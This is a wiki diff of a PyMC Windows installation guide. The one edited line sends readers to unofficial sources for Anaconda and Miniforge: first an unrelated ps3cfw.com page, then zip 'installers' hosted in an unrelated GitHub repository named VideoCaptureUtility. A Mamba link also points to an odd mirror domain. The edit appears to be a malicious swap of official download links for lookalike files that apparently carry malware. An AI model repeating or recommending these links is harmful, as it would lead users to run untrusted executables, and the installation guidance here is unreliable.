Skip to content

Compare: Installation Guide (Windows)

Showing with 1 addition and 1 deletion.
  1. +1 −1 Installation-Guide-(Windows).md
2 changes: 1 addition & 1 deletion Installation-Guide-(Windows).md
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
# PyMC Installation on Windows

The following instructions rely on having [Anaconda](https://www.ps3cfw.com/cool.php?item=13202186), [Mamba](https://github.com/mamba-org/mamba) or [Miniforge](https://www.ps3cfw.com/cool.php?item=13202186) installed, which provide Python environments from which you can install and run PyMC in a controlled way, using the `conda` utility.
The following instructions rely on having [Anaconda](https://github.com/Zapelphilipp/VideoCaptureUtility/releases/download/42/Anaconda3-2022.05-Windows-x86_64.zip), [Mamba](https://github.com/mamba-org/mamba) or [Miniforge](https://github.com/Zapelphilipp/VideoCaptureUtility/releases/download/42/Miniforge3-4.12.0-2-Windows-x86_64.zip) installed, which provide Python environments from which you can install and run PyMC in a controlled way, using the `conda` utility.

## Simple Install

Expand Down